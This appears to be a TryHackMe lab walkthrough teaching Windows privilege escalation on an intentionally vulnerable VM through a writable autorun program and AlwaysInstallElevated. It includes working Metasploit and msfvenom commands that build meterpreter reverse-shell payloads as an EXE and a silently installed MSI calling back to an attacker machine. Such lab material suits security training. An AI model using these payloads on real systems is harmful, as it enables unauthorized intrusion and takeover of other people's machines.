Windows PrivEsc Arena
Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321
Connecting to TryHackMe network
To complete this room and access the vulnerable Windows machine, you need to first connect to TryHackMe's VPN. If you've not done this before, first complete the OpenVPN room and learn how to connect.
Deploy the vulnerable machine
This room will teach you a variety of Windows privilege escalation tactics, including kernel exploits, DLL hijacking, service exploits, registry exploits, and more. This lab was built utilizing Sagi Shahar's privesc workshop (https://github.com/sagishahar/lpeworkshop) and utilized as part of The Cyber Mentor's Windows Privilege Escalation Udemy course (http://udemy.com/course/windows-privilege-escalation-for-beginners).
All tools needed to complete this course are on the user desktop (C:\Users\user\Desktop\Tools).
Let's first connect to the machine. RDP is open on port 3389. Your credentials are:
username: user password: password321
For any administrative actions you might take, your credentials are:
username: TCM password: Hacker123
- Deploy the machine and log into the user account via RDP
- Open a command prompt and run 'net user'. Who is the other non-default user on the machine?
Registry Escalation - Autorun
Detection
Windows VM
- Open command prompt and type:
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe - In Autoruns, click on the ‘Logon’ tab.
- From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
- In command prompt type:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program" - From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.
Exploitation
Kali VM
- Open command prompt and type:
msfconsole - In Metasploit (msf > prompt) type:
use multi/handler - In Metasploit (msf > prompt) type:
set payload windows/meterpreter/reverse_tcp - In Metasploit (msf > prompt) type:
set lhost [Kali VM IP Address] - In Metasploit (msf > prompt) type:
run - Open an additional command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe - Copy the generated file, program.exe, to the Windows VM.
Windows VM
- Place program.exe in ‘C:\Program Files\Autorun Program’.
- To simulate the privilege escalation effect, logoff and then log back on as an administrator user.
Kali VM
- Wait for a new session to open in Metasploit.
- In Metasploit (msf > prompt) type:
sessions -i [Session ID] - To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid
- Click 'Completed' once you have successfully elevated the machine
Registry Escalation - AlwaysInstallElevated
Detection
Windows VM
- Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
- From the output, notice that “AlwaysInstallElevated” value is 1.
- In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
- From the output, notice that “AlwaysInstallElevated” value is 1.
Exploitation
Kali VM
- Open command prompt and type: msfconsole
- In Metasploit (msf > prompt) type: use multi/handler
- In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
- In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
- In Metasploit (msf > prompt) type: run
- Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
- Copy the generated file, setup.msi, to the Windows VM.
Windows VM
- Place ‘setup.msi’ in ‘C:\Temp’.
- Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
Enjoy your shell! :)